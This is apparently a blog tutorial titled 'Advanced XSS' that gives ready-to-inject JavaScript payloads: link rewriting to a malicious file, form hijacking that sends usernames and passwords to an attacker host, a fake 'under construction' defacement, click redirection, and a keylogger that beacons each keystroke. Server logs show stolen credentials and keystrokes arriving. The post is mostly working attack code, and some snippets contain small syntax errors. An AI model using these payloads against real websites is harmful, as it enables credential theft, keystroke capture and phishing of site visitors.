Advanced XSS

2 minute read

Advanced XSS builds upon my previous post, Basic XSS.

Modifiying HTML

  • Changing the title of the target page to New Title.
document.getElementsByTagName("h1")[0].innerHTML = "New Title";

  • Changing all links on the target page to point to our attacking host, serving up the malicious file evil.txt.
var links = document.getElementsByTagName("a");
for (i=0; i < links.length; i++)
    links.[i].href = "http://AttackerIP/evil.txt";

Form Submission Hijacking

  • For the username and password variables we select the first form, indicated by forms[0].

  • We then select the first and second elements of said form, where elements[0] represents the username input field and elements[1] the password input field.

  • Data input into these fields are then assigned to their respective variables.

  • Once the form is submitted by the victim our function InterceptForm is called: document.forms[0].onsubmit = InterceptForm;.

  • We then simply send ourselves the captured credentials by leveraging Image().src and setting the value to our own HTTP server.

function InterceptForm()
    var username = document.forms[0].elements[0].value; 
    var password = document.forms[0].elements[1].value;   
    new Image().src = "http://AttackerIP/?username="+username+"&password="+password;
document.forms[0].onsubmit = InterceptForm;
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the credentials from our JavaScript payload 
... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -

Social Engineering

  • First we create the h2 element and input our new heading text, stating Website Under Construction.

  • Secondly, we then create the h3 element and input our malicious redirect text Please visit

  • Upon clicking, the link will send the victim to a domain/malicious file under our control.

  • We want to keep our malicious domain as close to the target domain as possible, tricking the victim into believing the site is legitimately down and following our link.

  • Lastly we append our h2 and h3 header elements to the page and remove the login form that was there orginally.

var input = document.createElement("h2");
input.innerHTML = "Website Under Construction"

var link = document.createElement("h3");
link.innerHTML = "Please visit" + "".link('');


Before injection:

After injection:

Capturing Clicks

  • We declare a function CaughtClick, with a link to our malicious URL.

  • We then add an EventListener to the document body.

  • If the victim clicks anywhere on the page whilst browsing our target site, the event listener will ‘catch’ this click and run our CaughtClick function. Sending the victim to a malicious site under our control.

  • For more information on JavaScript events, please click here.

function CaughtClick()
    location.href = "http://AttackerIP/evil.txt";
document.body.addEventListener('click', CaughtClick, true);


  • We assign the onkeypress event to our function KeyLog.

  • We then assign the victim’s input to the variable input, and parse it as an argument to the KeyLog function.

  • The key_pressed variable is assigned to a Unicode number, based on the specific key pressed by the victim, which is then converted into a character.

  • Finally, we send each value of key_pressed to our Python SimpleHTTPServer using Image().src.

document.onkeypress = function KeyLog(input)
    key_pressed = String.fromCharCode(input.which);
    new Image().src = "http://AttackerIP/?"+key_pressed;
root@kali:~# python -m SimpleHTTPServer 80  
// Receive the keystrokes from our JavaScript payload 
... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /?  HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -